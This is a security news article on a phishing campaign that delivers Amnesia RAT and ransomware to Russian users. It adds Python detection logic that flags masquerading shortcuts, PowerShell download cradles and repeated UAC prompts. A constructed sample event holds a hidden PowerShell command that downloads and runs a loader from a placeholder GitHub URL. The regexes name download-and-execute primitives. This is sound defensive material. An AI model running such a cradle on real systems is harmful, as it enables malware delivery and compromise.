Multi-stage phishing campaign targets Russian users with Amnesia RAT and ransomware

A new multi-stage phishing campaign is targeting users in Russia with a combination of ransomware and a remote access trojan known as Amnesia RAT, according to Fortinet FortiGuard Labs.

The lures are business-themed documents carrying fake task assignments or status updates. The threat actors spread the delivery chain across public cloud services, hosting scripts on GitHub and staging the binary payloads on Dropbox, so that the downloads look like ordinary traffic to trusted sites. They also use Defendnot, a tool that registers a fake antivirus product with Windows Security Center so that Windows turns Microsoft Defender off by itself, as it would when a genuine third-party antivirus is installed.

The phishing email carries a compressed archive containing decoy files and a malicious Windows shortcut (LNK). The shortcut uses a Russian-language filename with a double extension, so that a name ending in a document extension such as .txt hides the real .lnk extension and the file passes as a harmless text document. When the user opens the shortcut, it runs a PowerShell command that downloads the first-stage loader from GitHub.

The later stages are scripts that assemble payloads directly in memory rather than writing them to disk, bypass security controls, and obtain elevated privileges by re-issuing the User Account Control prompt until the user approves the elevation. The final stage delivers Amnesia RAT, which provides extensive data theft and remote control, alongside ransomware derived from the Hakuna Matata family. The ransomware encrypts a wide range of file types, replaces cryptocurrency wallet addresses on the clipboard so that payments are redirected to the attacker, and finally deploys a WinLocker screen locker that blocks the user from interacting with the machine.
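The LNK-to-PowerShell download cradle and the repeated UAC prompts described above both leave traces in endpoint process telemetry. The following Python is an added example written for this page, not Fortinet's code and not an indicator from the report: it runs simple detection logic over a handful of constructed Sysmon-style records (the host names, timestamps, the Russian filename and the raw.githubusercontent.com path are all made up) and flags three patterns: a shortcut hiding behind a document extension placed before .lnk, explorer.exe spawning PowerShell that fetches a script from GitHub or Dropbox, and consent.exe (the UAC prompt process) starting repeatedly on one host inside a short window.

```python
"""Detection logic for the LNK -> PowerShell -> cloud-hosted loader chain and
the repeated-UAC-prompt elevation pattern. Added example; the EVENTS below are
constructed Sysmon-style records, not telemetry from the campaign."""
import re
from collections import deque
from datetime import datetime, timedelta

# Masquerading: a document extension immediately followed by the real .lnk extension.
DOUBLE_EXT_LNK = re.compile(r"\.(txt|doc|docx|pdf|xls|xlsx|rtf)\.lnk$", re.IGNORECASE)
# Common PowerShell download/execute primitives.
CRADLE = re.compile(r"(Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|"
                    r"Net\.WebClient|Invoke-Expression|\biex\b)", re.IGNORECASE)
# The public services the article names as hosting scripts and binaries.
CLOUD_HOST = re.compile(r"https?://(raw\.githubusercontent\.com|github\.com|"
                        r"(www\.|dl\.)?dropbox(usercontent)?\.com)/", re.IGNORECASE)

# Constructed sample events (hypothetical hosts, paths and URL).
EVENTS = [
    {"ts": "2025-01-10T09:00:30", "host": "ws1", "event": "file_create",
     "path": r"C:\Users\ivan\Downloads\Отчет_по_задаче.txt.lnk"},
    {"ts": "2025-01-10T09:01:02", "host": "ws1", "event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell.exe -w hidden -ep bypass -c "iex (iwr '
                'https://raw.githubusercontent.com/example/repo/main/loader.ps1)"'},
    {"ts": "2025-01-10T09:02:00", "host": "ws1", "event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell.exe -c Get-Process"},
    # Four UAC prompts in 21 seconds on ws1: the re-prompt-until-approved loop.
    *[{"ts": f"2025-01-10T09:05:{s:02d}", "host": "ws1", "event": "process_create",
       "image": r"C:\Windows\System32\consent.exe",
       "parent": r"C:\Windows\System32\svchost.exe", "cmdline": "consent.exe"}
      for s in (0, 8, 15, 21)],
    # A single, legitimate prompt on another host.
    {"ts": "2025-01-10T09:10:00", "host": "ws2", "event": "process_create",
     "image": r"C:\Windows\System32\consent.exe",
     "parent": r"C:\Windows\System32\svchost.exe", "cmdline": "consent.exe"},
]


def is_masquerading_lnk(filename: str) -> bool:
    """True for names like 'report.txt.lnk' that pose as documents."""
    return DOUBLE_EXT_LNK.search(filename) is not None


def is_cloud_download_cradle(cmdline: str) -> bool:
    """True when a command line both fetches/executes remote content and
    points at one of the cloud services used for staging."""
    return bool(CRADLE.search(cmdline) and CLOUD_HOST.search(cmdline))


def lnk_launched_powershell(ev: dict) -> bool:
    """A double-clicked shortcut is launched by explorer.exe, so PowerShell
    with explorer.exe as its parent is the LNK execution signature."""
    return (ev["event"] == "process_create"
            and ev["image"].lower().endswith(("powershell.exe", "pwsh.exe"))
            and ev["parent"].lower().endswith("explorer.exe"))


def uac_prompt_storm(events, threshold=3, window=timedelta(seconds=60)):
    """Return (host, ts, count) once per host where consent.exe starts at
    least `threshold` times inside a sliding `window`."""
    hits, flagged, recent = [], set(), {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["event"] != "process_create" or not ev["image"].lower().endswith("consent.exe"):
            continue
        host = ev["host"]
        if host in flagged:
            continue
        t = datetime.fromisoformat(ev["ts"])
        q = recent.setdefault(host, deque())
        q.append(t)
        while t - q[0] > window:          # drop prompts older than the window
            q.popleft()
        if len(q) >= threshold:
            hits.append((host, ev["ts"], len(q)))
            flagged.add(host)
    return hits


def detect(events):
    """Run all three checks and return (rule, host, ts) findings."""
    findings = []
    for ev in events:
        if ev["event"] == "file_create" and is_masquerading_lnk(ev["path"]):
            findings.append(("double_ext_lnk", ev["host"], ev["ts"]))
        if lnk_launched_powershell(ev) and is_cloud_download_cradle(ev["cmdline"]):
            findings.append(("lnk_cloud_cradle", ev["host"], ev["ts"]))
    for host, ts, _count in uac_prompt_storm(events):
        findings.append(("uac_prompt_storm", host, ts))
    return findings


if __name__ == "__main__":
    for rule, host, ts in detect(EVENTS):
        print(f"{ts} {host} {rule}")
```

The explorer.exe parent check is what ties the PowerShell cradle to a user-opened shortcut rather than to an administrator's console session, which is why the cmd.exe-spawned `Get-Process` record is not flagged. The UAC rule deliberately fires once per host and uses a short window, because a single prompt is routine and only the tight cluster reflects the re-prompting loop.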

“This attack chain demonstrates how modern malware campaigns can achieve full system compromise without exploiting software vulnerabilities. Instead, the threat actor relies on social engineering, widely trusted platforms such as GitHub and Dropbox, and the abuse of legitimate operating system functionality to stage, deliver, and execute payloads while blending into normal enterprise traffic,” the Fortinet researchers concluded.
